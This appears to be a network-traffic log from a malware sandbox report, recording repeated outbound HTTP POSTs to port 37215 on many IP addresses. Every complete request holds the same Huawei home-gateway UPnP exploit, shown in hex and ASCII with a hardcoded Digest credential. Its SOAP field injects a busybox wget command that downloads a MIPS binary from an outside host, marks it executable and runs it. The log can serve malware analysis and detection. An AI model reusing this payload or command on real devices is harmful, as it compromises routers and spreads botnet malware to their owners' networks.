                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            183192.168.2.1356786197.59.140.9937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.023435116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            184192.168.2.1352364197.238.227.22937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.024162054 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            185192.168.2.1349654197.98.178.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.024876118 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            186192.168.2.1340448156.11.232.2737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.025563002 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            187192.168.2.1343020156.253.209.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.026294947 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            188192.168.2.1342370197.218.185.19137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.027008057 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            189192.168.2.135509641.59.124.1337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.027698994 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            190192.168.2.1342996197.211.105.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.028419018 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            191192.168.2.1334938156.205.120.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.029158115 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            192192.168.2.133342641.199.166.6537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.029895067 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
